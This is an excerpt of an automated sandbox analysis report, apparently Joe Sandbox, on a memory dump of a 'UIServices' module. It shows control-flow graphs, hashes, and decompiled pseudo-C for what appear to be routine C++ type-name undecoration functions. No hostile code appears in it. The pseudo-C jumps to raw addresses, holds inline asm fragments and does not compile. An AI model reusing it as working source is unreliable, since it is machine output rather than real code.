7ffc235689c1-7ffc235689c3 634->649 650 7ffc23568a45-7ffc23568a4c 634->650 636->570 637->636 639->626 640->626 652 7ffc23568b22-7ffc23568b2f 641->652 653 7ffc23568abc-7ffc23568abf 641->653 646->639 659 7ffc23568a5b-7ffc23568a5e 647->659 660 7ffc23568a76-7ffc23568a7d 647->660 656 7ffc23568a27-7ffc23568a40 649->656 657 7ffc235689c5-7ffc235689c8 649->657 650->639 652->626 663 7ffc23568b13-7ffc23568b20 653->663 664 7ffc23568ac1-7ffc23568ac4 653->664 654->604 656->612 661 7ffc235689ca-7ffc235689d0 657->661 662 7ffc235689e8-7ffc23568a22 call 7ffc23568898 call 7ffc23566cf4 657->662 667 7ffc23568b01-7ffc23568b08 659->667 668 7ffc23568a64-7ffc23568a71 659->668 660->639 661->667 673 7ffc235689d6-7ffc235689e3 661->673 662->564 663->626 669 7ffc23568b0a-7ffc23568b11 664->669 670 7ffc23568ac6 664->670 667->639 668->626 669->639 670->667 676 7ffc23568ac8-7ffc23568acb 670->676 673->626 676->667 677 7ffc23568acd-7ffc23568af0 call 7ffc23569d44 676->677 677->612 682 7ffc23568af6-7ffc23568afc 677->682 682->570
                                                    C-Code - Quality: 66%
                                                    			E00007FFC7FFC23568898(void* __edx, void* __edi, long long __rbx, long long* __rcx, long long* __rdx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                    				signed int _v16;
                                                    				signed int _v24;
                                                    				signed int _v32;
                                                    				char _v40;
                                                    				signed int _v48;
                                                    				signed int _v56;
                                                    				signed int _t103;
                                                    				void* _t104;
                                                    				signed int _t105;
                                                    				void* _t108;
                                                    				signed char _t114;
                                                    				signed int _t131;
                                                    				signed int _t134;
                                                    				void* _t137;
                                                    				signed int _t138;
                                                    				void* _t142;
                                                    				signed int _t143;
                                                    				void* _t146;
                                                    				signed int _t147;
                                                    				void* _t149;
                                                    				void* _t156;
                                                    				void* _t160;
                                                    				void* _t174;
                                                    				void* _t191;
                                                    				signed char* _t192;
                                                    				signed char* _t193;
                                                    				signed char* _t198;
                                                    				long long _t217;
                                                    				signed int _t226;
                                                    				signed long long* _t257;
                                                    				long long* _t270;
                                                    				long long _t272;
                                                    				void* _t274;
                                                    				void* _t277;
                                                    				signed char* _t280;
                                                    				signed long long* _t283;
                                                    				void* _t287;
                                                    				long long* _t289;
                                                    
                                                    				_t272 = __rsi;
                                                    				_t206 = __rbx;
                                                    				_t146 = __edi;
                                                    				_t142 = __edx;
                                                    				_t191 = _t277;
                                                    				 *((long long*)(_t191 + 8)) = __rbx;
                                                    				 *((long long*)(_t191 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t191 + 0x18)) = __rdi;
                                                    				 *((long long*)(_t191 + 0x20)) = __r14;
                                                    				_t192 =  *0x23574360; // 0x0
                                                    				_t289 = __rdx;
                                                    				_t270 = __rcx;
                                                    				_t147 =  *_t192 & 0x000000ff;
                                                    				if (sil == 0) goto 0x23568d9e;
                                                    				_v56 = _v56 & 0x00000000;
                                                    				_t7 =  &(_t192[1]); // 0x1
                                                    				_t280 = _t7;
                                                    				_v48 = _v48 & 0x00000000;
                                                    				_t103 = _t147;
                                                    				 *0x23574360 = _t280;
                                                    				_t149 = _t147 - 0x4e;
                                                    				if (_t149 > 0) goto 0x23568964;
                                                    				if (_t149 == 0) goto 0x23568cb8;
                                                    				if (_t103 - 0x43 < 0) goto 0x23568c77;
                                                    				if (_t103 - 0x45 <= 0) goto 0x23568955;
                                                    				if (_t103 - 0x47 <= 0) goto 0x2356894c;
                                                    				if (_t103 - 0x49 <= 0) goto 0x2356893d;
                                                    				if (_t103 - 0x4b <= 0) goto 0x2356892e;
                                                    				if (_t103 != 0x4d) goto 0x23568c77;
                                                    				r8d = 5;
                                                    				_t104 = E00007FFC7FFC23566B04(_t192, __rbx,  &_v56, "float", __rcx, __rsi);
                                                    				goto 0x23568ce0;
                                                    				r8d = 4;
                                                    				goto 0x23568920;
                                                    				r8d = 3;
                                                    				goto 0x23568920;
                                                    				goto 0x2356891a;
                                                    				r8d = 4;
                                                    				goto 0x23568920;
                                                    				_t156 = _t104 - 0x4f;
                                                    				if (_t156 == 0) goto 0x23568ca2;
                                                    				if (_t156 <= 0) goto 0x23568c77;
                                                    				if (_t104 - 0x53 <= 0) goto 0x23568b74;
                                                    				if (_t104 == 0x58) goto 0x23568b62;
                                                    				if (sil != 0x5f) goto 0x23568c77;
                                                    				_t131 =  *_t280 & 0x000000ff;
                                                    				_t11 =  &(_t280[1]); // 0x2
                                                    				 *0x23574360 = _t11;
                                                    				_t105 = _t131;
                                                    				_t160 = _t131 - 0x4e;
                                                    				if (_t160 > 0) goto 0x23568aa0;
                                                    				if (_t160 == 0) goto 0x23568a8e;
                                                    				if (_t105 - 0x47 > 0) goto 0x23568a51;
                                                    				if (_t105 - 0x46 >= 0) goto 0x23568a45;
                                                    				if (_t131 == 0) goto 0x23568a27;
                                                    				if (_t105 == 0x24) goto 0x235689e8;
                                                    				if (_t105 + 0xffffffbc - 1 > 0) goto 0x23568b01;
                                                    				r8d = 6;
                                                    				goto 0x23568b4d;
                                                    				_t193 = "__w64 ";
                                                    				_v16 = 6;
                                                    				_v24 = _t193;
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				E00007FFC7FFC23568898(_t142, _t146, _t206,  &_v40, "__int8", __rcx, _t272, __rdx);
                                                    				_t207 = _t193;
                                                    				_t108 = E00007FFC7FFC23566CF4(_t193,  &_v56,  &_v24);
                                                    				goto 0x23568db4;
                                                    				 *0x23574360 = _t193;
                                                    				_v56 = 0x23571ac0;
                                                    				_v48 = 1;
                                                    				goto 0x23568cf5;
                                                    				goto 0x23568b47;
                                                    				if (_t108 - 0x49 <= 0) goto 0x23568a82;
                                                    				if (_t108 - 0x4b <= 0) goto 0x23568a76;
                                                    				if (_t108 - 0x4d > 0) goto 0x23568b01;
                                                    				r8d = 8;
                                                    				goto 0x23568b4d;
                                                    				goto 0x23568b47;
                                                    				goto 0x23568b47;
                                                    				r8d = 4;
                                                    				goto 0x23568b4d;
                                                    				if (_t108 == 0x4f) goto 0x23568b5b;
                                                    				if (_t108 == 0x51) goto 0x23568b40;
                                                    				if (_t108 == 0x52) goto 0x23568b31;
                                                    				if (_t108 == 0x53) goto 0x23568b22;
                                                    				if (_t108 == 0x55) goto 0x23568b13;
                                                    				_t174 = _t108 - 0x57;
                                                    				if (_t174 == 0) goto 0x23568b0a;
                                                    				if (_t174 <= 0) goto 0x23568b01;
                                                    				if (_t131 - 0x59 > 0) goto 0x23568b01;
                                                    				 *0x23574360 = _t193 - 1;
                                                    				E00007FFC7FFC23569D44(_t137, _t142, _t193,  &_v24, _t270, _t193, _t287);
                                                    				_t217 =  *0x23571ac0;
                                                    				_t143 =  *0x7FFC23571AC8;
                                                    				_v56 = _t217;
                                                    				_v48 = _t143;
                                                    				if (_t217 != 0) goto 0x23568cf5;
                                                    				 *_t270 = _t217;
                                                    				 *(_t270 + 8) = _t143;
                                                    				goto 0x23568dbc;
                                                    				goto 0x23568b47;
                                                    				goto 0x23568b47;
                                                    				r8d = 8;
                                                    				goto 0x23568b4d;
                                                    				r8d = 8;
                                                    				goto 0x23568b4d;
                                                    				r8d = 9;
                                                    				goto 0x23568b4d;
                                                    				r8d = 7;
                                                    				E00007FFC7FFC23566B04(0x23571ac0, _t193,  &_v56, "char8_t", _t270, _t272);
                                                    				goto 0x23568cf5;
                                                    				goto 0x23568b77;
                                                    				r8d = 4;
                                                    				goto 0x23568920;
                                                    				_v56 = _v56 & 0x00000000;
                                                    				_v48 = _v48 & 0x00000000;
                                                    				_t138 =  *(_t289 + 8);
                                                    				_v24 = "void";
                                                    				_v16 = _t138;
                                                    				if (2 != 0xfffffffe) goto 0x23568bf2;
                                                    				_v16 = _t138 | 0x00000800;
                                                    				r9d = 0;
                                                    				E00007FFC7FFC2356B8A8(_t143, _t146, _t193,  &_v40,  &_v56, _t270, _t272,  &_v24, _t274);
                                                    				if ((0x00000800 & _v32) != 0) goto 0x23568be3;
                                                    				_v16 = 2;
                                                    				_v24 = 0x23570ea0;
                                                    				_t257 =  &_v24;
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				_t114 = E00007FFC7FFC23566FF8(_t143, _t146, 0x23570ea0, _t193,  &_v40, _t257, _t272);
                                                    				 *_t270 = _v40;
                                                    				 *(_t270 + 8) = _v32;
                                                    				goto 0x23568dbc;
                                                    				if (_t257 != 0) goto 0x23568c5c;
                                                    				_t134 = _t114 & 0x00000002;
                                                    				if ((_t114 & 0x00000001) == 0) goto 0x23568c42;
                                                    				r8d = _t257 + 5;
                                                    				E00007FFC7FFC23566B04(_v40, _t207,  &_v56, "const", _t270, _t272);
                                                    				if (_t134 == 0) goto 0x23568c5c;
                                                    				_v32 = 9;
                                                    				_v40 = " volatile";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566FF8(_t143, _t146, " volatile", _t207,  &_v56,  &_v40, _t272);
                                                    				goto 0x23568c5c;
                                                    				if (_t134 == 0) goto 0x23568c5c;
                                                    				r8d = 8;
                                                    				E00007FFC7FFC23566B04(" volatile", _t207,  &_v56, "volatile", _t270, _t272);
                                                    				r9d = 1;
                                                    				_t283 =  &_v24;
                                                    				E00007FFC7FFC2356B8A8(_t143, _t146, _t207, _t270,  &_v56, _t270, _t272, _t283);
                                                    				goto 0x23568dbc;
                                                    				_t57 = _t283 - 1; // 0x0
                                                    				_t198 = _t57;
                                                    				 *0x23574360 = _t198;
                                                    				E00007FFC7FFC23569D44(_v32, _t143, _t207,  &_v24, _t270, _t283, _t287);
                                                    				_t226 =  *_t198;
                                                    				_v56 = _t226;
                                                    				_v48 = _t198[8];
                                                    				if (_t226 != 0) goto 0x23568ce0;
                                                    				goto 0x23568af6;
                                                    				r8d = 5;
                                                    				E00007FFC7FFC23566B04(_t198, _t207,  &_v56, "long ", _t270, _t272);
                                                    				_v16 = 6;
                                                    				_v24 = "double";
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				E00007FFC7FFC23566FF8(_t198[8], _t146, "double", _t207,  &_v56,  &_v24, _t272);
                                                    				if (sil == 0x43) goto 0x23568d12;
                                                    				_t67 = _t272 - 0x45; // -69
                                                    				if ((_t67 & 0x000000f9) == 0) goto 0x23568d02;
                                                    				if (sil != 0x5f) goto 0x23568d58;
                                                    				if (0xffffffffffffffbb - 8 > 0) goto 0x23568d58;
                                                    				if (1 != 0) goto 0x23568d58;
                                                    				_v16 = 9;
                                                    				goto 0x23568d20;
                                                    				_v16 = 7;
                                                    				_v24 = "signed ";
                                                    				asm("movaps xmm0, [ebp-0x10]");
                                                    				asm("movdqa [ebp-0x10], xmm0");
                                                    				E00007FFC7FFC23566CF4("signed ",  &_v40,  &_v24);
                                                    				E00007FFC7FFC23566F74("signed ",  &_v24,  &_v56);
                                                    				_v56 = _v24;
                                                    				_v48 = _v16;
                                                    				if ( *_t289 == 0) goto 0x23568d8f;
                                                    				_v24 = _v24 & 0x00000000;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				E00007FFC7FFC23568150(0x20, _v24, _t207,  &_v24);
                                                    				E00007FFC7FFC23566F74( &_v24,  &_v40, _t289);
                                                    				E00007FFC7FFC23567078(_v32,  &_v56,  &_v40, _t289);
                                                    				 *_t270 = _v56;
                                                    				 *(_t270 + 8) = _v48;
                                                    				goto 0x23568dbc;
                                                    				_v16 = _v16 & 0x00000000;
                                                    				_v24 = 0x23571ac0;
                                                    				return E00007FFC7FFC23566F74( &_v24, _t270, _t289);
                                                    			}









































                                                    0x7ffc23568898
                                                    0x7ffc23568898
                                                    0x7ffc23568898
                                                    0x7ffc23568898
                                                    0x7ffc23568898
                                                    0x7ffc2356889b
                                                    0x7ffc2356889f
                                                    0x7ffc235688a3
                                                    0x7ffc235688a7
                                                    0x7ffc235688b3
                                                    0x7ffc235688ba
                                                    0x7ffc235688bd
                                                    0x7ffc235688c0
                                                    0x7ffc235688c6
                                                    0x7ffc235688cc
                                                    0x7ffc235688d1
                                                    0x7ffc235688d1
                                                    0x7ffc235688d5
                                                    0x7ffc235688d9
                                                    0x7ffc235688db
                                                    0x7ffc235688e2
                                                    0x7ffc235688e5
                                                    0x7ffc235688e7
                                                    0x7ffc235688f0
                                                    0x7ffc235688f9
                                                    0x7ffc235688fe
                                                    0x7ffc23568903
                                                    0x7ffc23568908
                                                    0x7ffc2356890d
                                                    0x7ffc2356891a
                                                    0x7ffc23568924
                                                    0x7ffc23568929
                                                    0x7ffc2356892e
                                                    0x7ffc2356893b
                                                    0x7ffc2356893d
                                                    0x7ffc2356894a
                                                    0x7ffc23568953
                                                    0x7ffc23568955
                                                    0x7ffc23568962
                                                    0x7ffc23568964
                                                    0x7ffc23568967
                                                    0x7ffc2356896d
                                                    0x7ffc23568976
                                                    0x7ffc2356897f
                                                    0x7ffc23568989
                                                    0x7ffc2356898f
                                                    0x7ffc23568993
                                                    0x7ffc23568997
                                                    0x7ffc2356899e
                                                    0x7ffc235689a0
                                                    0x7ffc235689a3
                                                    0x7ffc235689a9
                                                    0x7ffc235689b2
                                                    0x7ffc235689bb
                                                    0x7ffc235689c3
                                                    0x7ffc235689c8
                                                    0x7ffc235689d0
                                                    0x7ffc235689d6
                                                    0x7ffc235689e3
                                                    0x7ffc235689e8
                                                    0x7ffc235689ef
                                                    0x7ffc235689f6
                                                    0x7ffc235689fe
                                                    0x7ffc23568a02
                                                    0x7ffc23568a07
                                                    0x7ffc23568a10
                                                    0x7ffc23568a17
                                                    0x7ffc23568a22
                                                    0x7ffc23568a2e
                                                    0x7ffc23568a35
                                                    0x7ffc23568a39
                                                    0x7ffc23568a40
                                                    0x7ffc23568a4c
                                                    0x7ffc23568a54
                                                    0x7ffc23568a59
                                                    0x7ffc23568a5e
                                                    0x7ffc23568a64
                                                    0x7ffc23568a71
                                                    0x7ffc23568a7d
                                                    0x7ffc23568a89
                                                    0x7ffc23568a8e
                                                    0x7ffc23568a9b
                                                    0x7ffc23568aa3
                                                    0x7ffc23568aac
                                                    0x7ffc23568ab5
                                                    0x7ffc23568aba
                                                    0x7ffc23568abf
                                                    0x7ffc23568ac1
                                                    0x7ffc23568ac4
                                                    0x7ffc23568ac6
                                                    0x7ffc23568acb
                                                    0x7ffc23568ad0
                                                    0x7ffc23568adb
                                                    0x7ffc23568ae0
                                                    0x7ffc23568ae3
                                                    0x7ffc23568ae6
                                                    0x7ffc23568aea
                                                    0x7ffc23568af0
                                                    0x7ffc23568af6
                                                    0x7ffc23568af9
                                                    0x7ffc23568afc
                                                    0x7ffc23568b08
                                                    0x7ffc23568b11
                                                    0x7ffc23568b13
                                                    0x7ffc23568b20
                                                    0x7ffc23568b22
                                                    0x7ffc23568b2f
                                                    0x7ffc23568b31
                                                    0x7ffc23568b3e
                                                    0x7ffc23568b47
                                                    0x7ffc23568b51
                                                    0x7ffc23568b56
                                                    0x7ffc23568b60
                                                    0x7ffc23568b62
                                                    0x7ffc23568b6f
                                                    0x7ffc23568b77
                                                    0x7ffc23568b7c
                                                    0x7ffc23568b83
                                                    0x7ffc23568b87
                                                    0x7ffc23568b8b
                                                    0x7ffc23568b91
                                                    0x7ffc23568ba2
                                                    0x7ffc23568ba5
                                                    0x7ffc23568bac
                                                    0x7ffc23568bb6
                                                    0x7ffc23568bb8
                                                    0x7ffc23568bc6
                                                    0x7ffc23568bca
                                                    0x7ffc23568bce
                                                    0x7ffc23568bd6
                                                    0x7ffc23568bdb
                                                    0x7ffc23568be7
                                                    0x7ffc23568bea
                                                    0x7ffc23568bed
                                                    0x7ffc23568bf5
                                                    0x7ffc23568bf9
                                                    0x7ffc23568bfe
                                                    0x7ffc23568c00
                                                    0x7ffc23568c0f
                                                    0x7ffc23568c16
                                                    0x7ffc23568c18
                                                    0x7ffc23568c26
                                                    0x7ffc23568c2e
                                                    0x7ffc23568c36
                                                    0x7ffc23568c3b
                                                    0x7ffc23568c40
                                                    0x7ffc23568c44
                                                    0x7ffc23568c46
                                                    0x7ffc23568c57
                                                    0x7ffc23568c5c
                                                    0x7ffc23568c62
                                                    0x7ffc23568c6d
                                                    0x7ffc23568c72
                                                    0x7ffc23568c77
                                                    0x7ffc23568c77
                                                    0x7ffc23568c7f
                                                    0x7ffc23568c86
                                                    0x7ffc23568c8b
                                                    0x7ffc23568c91
                                                    0x7ffc23568c95
                                                    0x7ffc23568c9b
                                                    0x7ffc23568c9d
                                                    0x7ffc23568ca2
                                                    0x7ffc23568cb3
                                                    0x7ffc23568cb8
                                                    0x7ffc23568cc6
                                                    0x7ffc23568cce
                                                    0x7ffc23568cd6
                                                    0x7ffc23568cdb
                                                    0x7ffc23568ce4
                                                    0x7ffc23568ce6
                                                    0x7ffc23568ceb
                                                    0x7ffc23568cf3
                                                    0x7ffc23568cfb
                                                    0x7ffc23568d00
                                                    0x7ffc23568d09
                                                    0x7ffc23568d10
                                                    0x7ffc23568d19
                                                    0x7ffc23568d20
                                                    0x7ffc23568d28
                                                    0x7ffc23568d30
                                                    0x7ffc23568d35
                                                    0x7ffc23568d45
                                                    0x7ffc23568d4e
                                                    0x7ffc23568d55
                                                    0x7ffc23568d5c
                                                    0x7ffc23568d5e
                                                    0x7ffc23568d67
                                                    0x7ffc23568d6d
                                                    0x7ffc23568d7d
                                                    0x7ffc23568d8a
                                                    0x7ffc23568d93
                                                    0x7ffc23568d99
                                                    0x7ffc23568d9c
                                                    0x7ffc23568d9e
                                                    0x7ffc23568da9
                                                    0x7ffc23568dd8

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                    • API String ID: 2943138195-1201493255
                                                    • Opcode ID: 4b2c21490afed62d83a2dfa5dfe8f1ab37e6e916fa2cc5ad5efdca011254f1f8
                                                    • Instruction ID: dddbde634cd25bb7453e5b6a5727e72b5cd784566ee10d7f8052161fbb561a78
                                                    • Opcode Fuzzy Hash: 4b2c21490afed62d83a2dfa5dfe8f1ab37e6e916fa2cc5ad5efdca011254f1f8
                                                    • Instruction Fuzzy Hash: A5F15DA2F18A6A88FB10CB54DC852FC27B0FB04748F5445B6CA1D766A9DF3CA644CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 683 7ffc2356bc80-7ffc2356bcb6 684 7ffc2356bcb9-7ffc2356bcc3 683->684 685 7ffc2356c08e-7ffc2356c098 684->685 686 7ffc2356bcc9-7ffc2356bcd0 684->686 687 7ffc2356c0ac-7ffc2356c0b6 685->687 688 7ffc2356c09a-7ffc2356c09d 685->688 689 7ffc2356bcd2-7ffc2356bcd9 686->689 690 7ffc2356bcdf-7ffc2356bce2 686->690 693 7ffc2356c0b8-7ffc2356c0c3 687->693 694 7ffc2356c0c5-7ffc2356c110 call 7ffc23566f48 call 7ffc23566f74 687->694 691 7ffc2356c113-7ffc2356c132 688->691 692 7ffc2356c09f-7ffc2356c0aa 688->692 689->690 689->691 695 7ffc2356bd5f-7ffc2356bd69 690->695 696 7ffc2356bce4-7ffc2356bd26 call 7ffc23566cf4 call 7ffc23566f74 690->696 692->691 693->691 694->691 698 7ffc2356bd6f-7ffc2356bd80 695->698 699 7ffc2356c05b-7ffc2356c069 call 7ffc2356da5c 695->699 696->695 722 7ffc2356bd28-7ffc2356bd5c call 7ffc23568150 call 7ffc23566f74 696->722 703 7ffc2356c036-7ffc2356c059 call 7ffc2356da5c 698->703 704 7ffc2356bd86-7ffc2356bd89 698->704 712 7ffc2356c06d-7ffc2356c073 call 7ffc23566f74 699->712 703->712 708 7ffc2356bfc0-7ffc2356c029 call 7ffc23566c44 call 7ffc23566cf4 call 7ffc23566f74 704->708 709 7ffc2356bd8f-7ffc2356bd92 704->709 735 7ffc2356c084-7ffc2356c088 708->735 756 7ffc2356c02b-7ffc2356c034 call 7ffc23567204 708->756 715 7ffc2356bf0d-7ffc2356bf11 709->715 716 7ffc2356bd98-7ffc2356bd9b 709->716 726 7ffc2356c078-7ffc2356c081 712->726 719 7ffc2356bf13-7ffc2356bf17 715->719 720 7ffc2356bf6f-7ffc2356bfbb call 7ffc235698c8 call 7ffc23568150 call 7ffc23566f74 call 7ffc23566fa0 715->720 716->708 724 7ffc2356bda1-7ffc2356bda4 716->724 719->720 725 7ffc2356bf19-7ffc2356bf5d call 7ffc2356abe0 call 7ffc23566f74 719->725 720->712 722->695 730 7ffc2356bdaa-7ffc2356bdad 724->730 731 7ffc2356bec8-7ffc2356bf08 call 7ffc2356da5c call 7ffc23566fa0 call 7ffc23566f74 724->731 725->735 761 7ffc2356bf63-7ffc2356bf6a 725->761 726->735 732 7ffc2356bdaf-7ffc2356bdbf call 7ffc2356aa14 730->732 733 7ffc2356bdc4-7ffc2356bdd5 730->733 731->726 732->712 741 7ffc2356bddc-7ffc2356bdf1 call 7ffc2356da5c 733->741 735->684 735->685 759 7ffc2356bdf3-7ffc2356bdf6 741->759 760 7ffc2356be47-7ffc2356be4f 741->760 756->735 768 7ffc2356be40-7ffc2356be45 759->768 769 7ffc2356bdf8-7ffc2356be37 call 7ffc23566f48 call 7ffc23566f74 759->769 765 7ffc2356be52-7ffc2356be5c 760->765 761->735 771 7ffc2356be5e-7ffc2356be68 765->771 772 7ffc2356beb8-7ffc2356bec3 765->772 775 7ffc2356be3a-7ffc2356be3e 768->775 769->775 771->741 776 7ffc2356be6e-7ffc2356beb3 call 7ffc23568150 call 7ffc23566f74 call 7ffc23566fa0 771->776 772->735 775->765 776->761
                                                    C-Code - Quality: 87%
                                                    			E00007FFC7FFC2356BC80(void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, void* __r12) {
                                                    				void* __r14;
                                                    				intOrPtr _t148;
                                                    				void* _t149;
                                                    				void* _t166;
                                                    				void* _t167;
                                                    				void* _t170;
                                                    				void* _t184;
                                                    				signed char* _t185;
                                                    				char* _t188;
                                                    				intOrPtr _t189;
                                                    				intOrPtr* _t190;
                                                    				intOrPtr* _t192;
                                                    				char* _t193;
                                                    				intOrPtr* _t196;
                                                    				char* _t197;
                                                    				long long _t201;
                                                    				intOrPtr* _t233;
                                                    				char* _t244;
                                                    				void* _t245;
                                                    				void* _t249;
                                                    				void* _t251;
                                                    				void* _t259;
                                                    				long long* _t265;
                                                    				void* _t270;
                                                    				void* _t272;
                                                    				void* _t273;
                                                    				void* _t291;
                                                    				long long _t292;
                                                    				long long _t294;
                                                    
                                                    				_t290 = __r12;
                                                    				_t288 = __r11;
                                                    				_t267 = __rsi;
                                                    				_t200 = __rbx;
                                                    				_t184 = _t272;
                                                    				 *((long long*)(_t184 + 8)) = __rbx;
                                                    				 *((long long*)(_t184 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t184 + 0x18)) = __rdi;
                                                    				_t270 = _t184 - 0x158;
                                                    				_t273 = _t272 - 0x240;
                                                    				r14d = 0;
                                                    				_t292 = "::";
                                                    				 *__rcx = _t294;
                                                    				sil = r14b;
                                                    				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                    				_t265 = __rcx;
                                                    				_t185 =  *0x23574360; // 0x0
                                                    				if (( *_t185 & 0x000000bf) == 0) goto 0x2356c08e;
                                                    				_t166 =  *0x23574374 - r14b; // 0x0
                                                    				if (_t166 == 0) goto 0x2356bcdf;
                                                    				_t167 =  *0x23574375 - r14b; // 0x0
                                                    				if (_t167 == 0) goto 0x2356c113;
                                                    				if ( *((intOrPtr*)(__rcx)) == _t294) goto 0x2356bd5f;
                                                    				 *((long long*)(_t270 - 0x60)) = _t292;
                                                    				 *((intOrPtr*)(_t270 - 0x58)) = 2;
                                                    				asm("movaps xmm0, [ebp-0x60]");
                                                    				asm("movdqa [esp+0x40], xmm0");
                                                    				E00007FFC7FFC23566CF4(_t185, _t270 + 0x30, _t273 + 0x40);
                                                    				E00007FFC7FFC23566F74(_t185, _t270 - 0x50, __rcx);
                                                    				 *_t265 =  *((intOrPtr*)(_t270 - 0x50));
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t270 - 0x48));
                                                    				if (sil == 0) goto 0x2356bd5f;
                                                    				 *((long long*)(_t273 + 0x50)) = _t294;
                                                    				 *((intOrPtr*)(_t273 + 0x58)) = r14d;
                                                    				E00007FFC7FFC23568150(0x5b,  *((intOrPtr*)(_t270 - 0x50)), __rbx, _t273 + 0x50);
                                                    				E00007FFC7FFC23566F74(_t273 + 0x50, _t270 - 0x40, _t265);
                                                    				sil = r14b;
                                                    				 *_t265 =  *((intOrPtr*)(_t270 - 0x40));
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t270 - 0x38));
                                                    				_t188 =  *0x23574360; // 0x0
                                                    				_t170 =  *_t188 - 0x3f;
                                                    				if (_t170 != 0) goto 0x2356c05b;
                                                    				_t24 = _t188 + 1; // 0x1
                                                    				_t244 = _t24;
                                                    				 *0x23574360 = _t244;
                                                    				if (_t170 == 0) goto 0x2356c036;
                                                    				if (_t170 == 0) goto 0x2356bfc0;
                                                    				if (_t170 == 0) goto 0x2356bf0d;
                                                    				if (_t170 == 0) goto 0x2356bfc0;
                                                    				if (_t170 == 0) goto 0x2356bec8;
                                                    				if ( *_t244 - 0xffffffffffffffff == 8) goto 0x2356bdc4;
                                                    				E00007FFC7FFC2356AA14( *_t244 - 0xffffffffffffffff - 8, _t188, _t200, _t270 + 0x40, _t244, __rsi, _t265, __r10, __r11, _t294);
                                                    				_t245 = _t270 + 0x130;
                                                    				goto 0x2356c06d;
                                                    				_t201 = _t294;
                                                    				 *((intOrPtr*)(_t273 + 0x28)) = r14d;
                                                    				_t28 = _t245 + 1; // 0x2
                                                    				_t189 = _t28;
                                                    				 *((long long*)(_t273 + 0x20)) = _t201;
                                                    				 *0x23574360 = _t189;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC2356DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t201, _t273 + 0x60, _t265, __rsi, _t265, __r10, __r11);
                                                    				if ( *((intOrPtr*)(_t273 + 0x68)) != 0) goto 0x2356be47;
                                                    				if (_t201 == 0) goto 0x2356be40;
                                                    				 *((long long*)(_t270 - 0x30)) = _t292;
                                                    				 *((intOrPtr*)(_t270 - 0x28)) = 2;
                                                    				asm("movaps xmm0, [ebp-0x30]");
                                                    				asm("movdqa [esp+0x40], xmm0");
                                                    				E00007FFC7FFC23566F48(_t273 + 0x60, _t270 + 0x120, _t273 + 0x40);
                                                    				E00007FFC7FFC23566F74(_t189, _t270 + 0x50, _t273 + 0x20);
                                                    				 *((intOrPtr*)(_t273 + 0x28)) =  *((intOrPtr*)(_t189 + 8));
                                                    				goto 0x2356be52;
                                                    				goto 0x2356be3a;
                                                    				 *((intOrPtr*)(_t273 + 0x28)) = 2;
                                                    				 *((long long*)(_t273 + 0x20)) = _t294;
                                                    				if ( *((intOrPtr*)(_t273 + 0x28)) != r14b) goto 0x2356beb8;
                                                    				_t190 =  *0x23574360; // 0x0
                                                    				if ( *_t190 != 0x40) goto 0x2356bddc;
                                                    				 *((long long*)(_t273 + 0x70)) = _t294;
                                                    				 *((intOrPtr*)(_t273 + 0x78)) = r14d;
                                                    				E00007FFC7FFC23568150(0x5b, _t190, _t294, _t273 + 0x70);
                                                    				E00007FFC7FFC23566F74(_t273 + 0x70, _t270 - 0x10, _t273 + 0x20);
                                                    				r8b = 0x5d;
                                                    				_t249 = _t270 + 0x60;
                                                    				E00007FFC7FFC23566FA0(_t270 - 0x10, _t249);
                                                    				 *_t265 =  *_t190;
                                                    				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t190 + 8));
                                                    				goto 0x2356bf63;
                                                    				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                    				 *((char*)(_t265 + 8)) = 2;
                                                    				 *_t265 = _t294;
                                                    				goto 0x2356c084;
                                                    				_t57 = _t249 + 1; // 0x2
                                                    				r8d = 0;
                                                    				 *0x23574360 = _t57;
                                                    				E00007FFC7FFC2356DA5C(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t294, _t270 + 0x70, _t265, _t267, _t273 + 0x20, __r10, __r11);
                                                    				r8b = 0x5d;
                                                    				E00007FFC7FFC23566FA0(_t57, _t270 + 0x80);
                                                    				_t251 = _t270 + 0x90;
                                                    				E00007FFC7FFC23566F74(_t57, _t251, _t265);
                                                    				sil = 1;
                                                    				goto 0x2356c078;
